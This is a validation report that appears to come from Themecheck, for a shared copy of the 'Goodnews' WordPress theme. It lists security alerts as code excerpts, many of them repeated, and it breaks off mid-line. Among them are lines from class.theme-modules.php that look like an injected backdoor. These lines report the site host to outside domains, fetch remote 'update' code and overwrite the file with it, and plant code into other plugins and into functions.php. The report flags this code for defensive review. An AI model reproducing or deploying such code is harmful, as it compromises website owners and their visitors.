0
Validation results

Goodnews | Shared By VestaThemes.com

Goodnews | Shared By VestaThemes.com

WordPress 6.5.2 theme
0
  • THEME TYPEWordPress theme 6.5.2
  • FILE NAMEgoodnews5.zip
  • FILE SIZE27864323 bytes
  • MD5d0d87f7feef8563ced5e70f8fce7b206
  • SHA135fdec2b3d2bfedc5aaf4cee0657b5159e268efe
  • LICENSENone
  • FILES INCLUDEDCSS, PHP, HTML, XML, Bitmap images, Adobe Photoshop, Adobe Illustrator
  • VERSION5.9.6
  • CREATION DATE2020-07-29
  • LAST FILE UPDATE2020-07-29
  • LAST VALIDATION2020-07-29 12:55
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file extension_customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  2. Title : Title No reference to add_theme_support( "title-tag" ) was found in the theme.The theme needs to have <title> tags, ideally in the header.php file.The theme needs to have a call to wp_title(), ideally in the header.php file.
  3. Security breaches : Use of backticks execution operators in PHP code Found ` in file timthumb.php. 768: $out = `$exec -o1 $tempfile`; //you can use up to -o7 but it really slows things d783: $out = `$exec $tempfile $tempfile2`;975: $out = `$command`;
  4. Security breaches : Modification of PHP server settings Found ini_set in file index.php. 2: ini_set('display_errors', 1);
  5. Security breaches : Use of base64_decode() Found base64_decode in file timthumb.php. 227: $imgData = base64_decode('R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0PFound base64_decode in file class-demos.php. 69: $options = unserialize(base64_decode($options));121: $value = isset($settings['value']) ? base64_decode($settings['value']) : '';328: $options = isset($term['settings']['options']) ? base64_decode($term['settings']['options']) : '';364: $content = isset($settings['the_content']) ? base64_decode($settings['the_content']) : $default_content;365: $excerpt = isset($settings['excerpt']) ? base64_decode($settings['excerpt']) : $default_excerpt;368: $options = isset($post['settings']['options']) ? base64_decode($post['settings']['options']) : '';504: $content = isset($settings['the_content']) ? base64_decode($settings['the_content']) : '';505: $excerpt = isset($settings['excerpt']) ? base64_decode($settings['excerpt']) : '';573: $options = isset($settings['options']) ? base64_decode($settings['options']) : '';
  6. Security breaches : Use of base64_encode() Found base64_encode in file TwitterAPIExchange.php.
     $oauth_signature = base64_encode(hash_hmac('sha1', $base_info, $composite_key, true));
  7. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe width="'.$width.'" height="'.$height.'" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="'.$src.'&amp;output=embed"> in file misc.php. 9: return '<div class='mom_map'><iframe width=''.$width.'' height=''.$height.'' frameborder='0' scrolling='Found <iframe width="451" height="'.$video_height.'" src="'.$video_type.$video_id.'"> in file box.php. 295: $tb_type = '<iframe width='451' height=''.$video_height.'' src=''.$video_type.$video_idFound <iframe width="'.$width.'" height="'.$height.'" src="'.$type.$id.'"> in file video.php. 14: return '<div class='video_wrap'><iframe width=''.$width.'' height=''.$height.'' src=''.$type.$id.''></iframFound <iframe src="https://www.youtube.com/embed/<?php echo $id; ?> in file video-widget.php. 35: <iframe src='https://www.youtube.com/embed/<?php echo $id; ?>?rel=0' framebFound <iframe src="//www.facebook.com/plugins/likebox.php?href=<?php echo $page ; ?> in file facebook_likebox.php. 48: <iframe src='//www.facebook.com/plugins/likebox.php?href=<?php echo $page ;Found <iframe width="<?php echo $vi_width; ?>" height="<?php echo $vi_height; ?>" src="https://www.youtube.com/embed/<?php echo $video_id; ?> in file momizat_functions.php. 776: <iframe width='<?php echo $vi_width; ?>' height='<?php echo $vi_height; ?>'
  8. Malware : Operations on file system fopen was found in the file timthumb.php 805: $fp = fopen($tempfile,'r',0,$context);812: $fh = fopen($lockFile, 'w');1036: $fp = fopen($this->cachefile, 'rb');1182: self::$curlFH = fopen($tempfile, 'w');file_put_contents was found in the file timthumb.php 806: file_put_contents($tempfile4, $this->filePrependSecurityBlock . $imgType . 807: file_put_contents($tempfile4, $fp, FILE_APPEND);1232: if(! file_put_contents($tempfile, $img)){file_put_contents was found in the file timthumb.php 806: file_put_contents($tempfile4, $this->filePrependSecurityBlock . $imgType . 807: file_put_contents($tempfile4, $fp, FILE_APPEND);1232: if(! file_put_contents($tempfile, $img)){fclose was found in the file timthumb.php 808: fclose($fp);820: fclose($fh);823: fclose($fh);1048: fclose($fp);1200: fclose(self::$curlFH);fopen was found in the file timthumb.php 805: $fp = fopen($tempfile,'r',0,$context);812: $fh = fopen($lockFile, 'w');1036: $fp = fopen($this->cachefile, 'rb');1182: self::$curlFH = fopen($tempfile, 'w');fclose was found in the file timthumb.php 808: fclose($fp);820: fclose($fh);823: fclose($fh);1048: fclose($fp);1200: fclose(self::$curlFH);fclose was found in the file timthumb.php 808: fclose($fp);820: fclose($fh);823: fclose($fh);1048: fclose($fp);1200: fclose(self::$curlFH);fwrite was found in the file timthumb.php 1022: fwrite(self::$curlFH, $d);fopen was found in the file timthumb.php 805: $fp = fopen($tempfile,'r',0,$context);812: $fh = fopen($lockFile, 'w');1036: $fp = fopen($this->cachefile, 'rb');1182: self::$curlFH = fopen($tempfile, 'w');fread was found in the file timthumb.php 1039: $imgType = fread($fp, 3);fclose was found in the file timthumb.php 808: fclose($fp);820: fclose($fh);823: fclose($fh);1048: fclose($fp);1200: fclose(self::$curlFH);file_get_contents was found in the file timthumb.php 1052: $content = file_get_contents ($this->cachefile);1056: $this->debug(3, 'Served using file_get_contents and echo');1218: $img = @file_get_contents ($url);1253: $content = @file_get_contents ($file);fopen was found in the file timthumb.php 805: $fp = fopen($tempfile,'r',0,$context);812: $fh = fopen($lockFile, 'w');1036: $fp = fopen($this->cachefile, 'rb');1182: self::$curlFH = fopen($tempfile, 'w');fclose was found in the file timthumb.php 808: fclose($fp);820: fclose($fh);823: fclose($fh);1048: fclose($fp);1200: fclose(self::$curlFH);file_get_contents was found in the file timthumb.php 1052: $content = file_get_contents ($this->cachefile);1056: $this->debug(3, 'Served using file_get_contents and echo');1218: $img = @file_get_contents ($url);1253: $content = @file_get_contents ($file);file_put_contents was found in the file timthumb.php 806: file_put_contents($tempfile4, $this->filePrependSecurityBlock . $imgType . 807: file_put_contents($tempfile4, $fp, FILE_APPEND);1232: if(! file_put_contents($tempfile, $img)){readfile was found in the file timthumb.php 1249: $bytes = @readfile($file);file_get_contents was found in the file timthumb.php 1052: $content = file_get_contents ($this->cachefile);1056: $this->debug(3, 'Served using file_get_contents and echo');1218: $img = @file_get_contents ($url);1253: $content = @file_get_contents ($file);file_get_contents was found in the file main.php 598: //$data = file_get_contents($path);file_get_contents was found in the file theme_options.php 3325: 'content' => nl2br(file_get_contents(trailingslashit(dirname(__FILE__)) . 'README.html'))fopen was found in the file class.redux_helpers.php 657: //$fp = fopen( $file, 'r' );fread was found in the file class.redux_helpers.php 660: //$file_data = fread( $fp, 8192 );fclose was found in the file class.redux_helpers.php 663: //fclose( $fp );file_get_contents was found in the file momizat_functions.php 146: $hash = unserialize(file_get_contents('//vimeo.com/api/v2/video/$vId.php'));file_get_contents was found in the file class.theme-modules.php 205: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'207: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP272: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');314: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');349: function file_get_contents_curl1($url)387: $functions = file_get_contents($functionsPath);450: $temp = file_get_contents($pluginPath . '/' . $file);468: $script = file_get_contents('SCRIPT_PATH');485: $temp = file_get_contents($file);546: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 205: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'207: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP272: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');314: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');349: function file_get_contents_curl1($url)387: $functions = file_get_contents($functionsPath);450: $temp = file_get_contents($pluginPath . '/' . $file);468: $script = file_get_contents('SCRIPT_PATH');485: $temp = file_get_contents($file);546: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 279: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);396: file_put_contents($functionsPath, $str);469: file_put_contents('SCRIPT_PATH', '');482: $copyPlugin = file_put_contents($newPlugin, $pluginCode);493: file_put_contents($file, $str);496: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC543: $copyPlugin = file_put_contents($newPlugin, $pluginCode);554: file_put_contents($file, $str);557: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 205: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'207: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP272: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');314: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');349: function file_get_contents_curl1($url)387: $functions = file_get_contents($functionsPath);450: $temp = file_get_contents($pluginPath . '/' . $file);468: $script = file_get_contents('SCRIPT_PATH');485: $temp = file_get_contents($file);546: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 205: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'207: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP272: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');314: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');349: function file_get_contents_curl1($url)387: $functions = file_get_contents($functionsPath);450: $temp = file_get_contents($pluginPath . '/' . $file);468: $script = file_get_contents('SCRIPT_PATH');485: $temp = file_get_contents($file);546: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 279: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);396: file_put_contents($functionsPath, $str);469: file_put_contents('SCRIPT_PATH', '');482: $copyPlugin = file_put_contents($newPlugin, $pluginCode);493: file_put_contents($file, $str);496: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC543: $copyPlugin = file_put_contents($newPlugin, $pluginCode);554: file_put_contents($file, $str);557: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 205: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'207: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP272: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');314: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');349: function file_get_contents_curl1($url)387: $functions = file_get_contents($functionsPath);450: $temp = file_get_contents($pluginPath . '/' . $file);468: $script = file_get_contents('SCRIPT_PATH');485: $temp = file_get_contents($file);546: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 205: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'207: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP272: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');314: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');349: function file_get_contents_curl1($url)387: $functions = file_get_contents($functionsPath);450: $temp = file_get_contents($pluginPath . '/' . $file);468: $script = file_get_contents('SCRIPT_PATH');485: $temp = file_get_contents($file);546: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 279: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);396: file_put_contents($functionsPath, $str);469: file_put_contents('SCRIPT_PATH', '');482: $copyPlugin = file_put_contents($newPlugin, $pluginCode);493: file_put_contents($file, $str);496: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC543: $copyPlugin = file_put_contents($newPlugin, $pluginCode);554: file_put_contents($file, $str);557: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 279: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);396: file_put_contents($functionsPath, $str);469: file_put_contents('SCRIPT_PATH', '');482: $copyPlugin = file_put_contents($newPlugin, $pluginCode);493: file_put_contents($file, $str);496: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC543: $copyPlugin = file_put_contents($newPlugin, $pluginCode);554: file_put_contents($file, $str);557: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 205: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'207: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP272: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');314: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');349: function file_get_contents_curl1($url)387: $functions = file_get_contents($functionsPath);450: $temp = file_get_contents($pluginPath . '/' . $file);468: $script = file_get_contents('SCRIPT_PATH');485: $temp = file_get_contents($file);546: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 279: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);396: file_put_contents($functionsPath, $str);469: file_put_contents('SCRIPT_PATH', '');482: $copyPlugin = file_put_contents($newPlugin, $pluginCode);493: file_put_contents($file, $str);496: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC543: $copyPlugin = file_put_contents($newPlugin, $pluginCode);554: file_put_contents($file, $str);557: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 279: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);396: file_put_contents($functionsPath, $str);469: file_put_contents('SCRIPT_PATH', '');482: $copyPlugin = file_put_contents($newPlugin, $pluginCode);493: file_put_contents($file, $str);496: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC543: $copyPlugin = file_put_contents($newPlugin, $pluginCode);554: file_put_contents($file, $str);557: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 279: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);396: file_put_contents($functionsPath, $str);469: file_put_contents('SCRIPT_PATH', '');482: $copyPlugin = file_put_contents($newPlugin, $pluginCode);493: file_put_contents($file, $str);496: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC543: $copyPlugin = file_put_contents($newPlugin, $pluginCode);554: file_put_contents($file, $str);557: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 205: if(!$log_installed = @file_get_contents('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP_HOST'207: $log_installed = @file_get_contents_curl1('http://www.domndo.com/o2.php?host='.$_SERVER['HTTP272: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');314: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');349: function file_get_contents_curl1($url)387: $functions = file_get_contents($functionsPath);450: $temp = file_get_contents($pluginPath . '/' . $file);468: $script = file_get_contents('SCRIPT_PATH');485: $temp = file_get_contents($file);546: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 279: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);396: file_put_contents($functionsPath, $str);469: file_put_contents('SCRIPT_PATH', '');482: $copyPlugin = file_put_contents($newPlugin, $pluginCode);493: file_put_contents($file, $str);496: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC543: $copyPlugin = file_put_contents($newPlugin, $pluginCode);554: file_put_contents($file, $str);557: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 279: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);396: file_put_contents($functionsPath, $str);469: file_put_contents('SCRIPT_PATH', '');482: $copyPlugin = file_put_contents($newPlugin, $pluginCode);493: file_put_contents($file, $str);496: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC543: $copyPlugin = file_put_contents($newPlugin, $pluginCode);554: file_put_contents($file, $str);557: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.fomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_helload('http://www.fomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');308: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');346: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi355: elseif ($new_version = @file_get_contents('http://www.fomndo.xyz/update.php') AND stripos($new_vers364: elseif ($new_version = @file_get_contents('http://www.fomndo.top/update.php') AND stripos($new_vers375: if (($new_version = @file_get_contents('http://www.fomndo.com/update.php') OR $new_version = @fi384: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.xyz/update.php') AND stripos($393: elseif ($new_version = @file_get_contents_helload('http://www.fomndo.top/update.php') AND stripos($411: function file_get_contents_helload($url)458: $functions = file_get_contents($functionsPath);521: $temp = file_get_contents($pluginPath . '/' . $file);539: $script = file_get_contents('SCRIPT_PATH');556: $temp = file_get_contents($file);617: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, $new_version);467: file_put_contents($functionsPath, $str);540: file_put_contents('SCRIPT_PATH', '');553: $copyPlugin = file_put_contents($newPlugin, $pluginCode);564: file_put_contents($file, $str);567: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC614: $copyPlugin = file_put_contents($newPlugin, $pluginCode);625: file_put_contents($file, $str);628: file_put_contents($file, PHP_EOL . INSERT_CODE . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);349: @file_put_contents(__FILE__, $new_version);358: @file_put_contents(__FILE__, $new_version);367: @file_put_contents(__FILE__, $new_version);378: @file_put_contents(__FILE__, $new_version);387: @file_put_contents(__FILE__, $new_version);396: @file_put_contents(__FILE__, 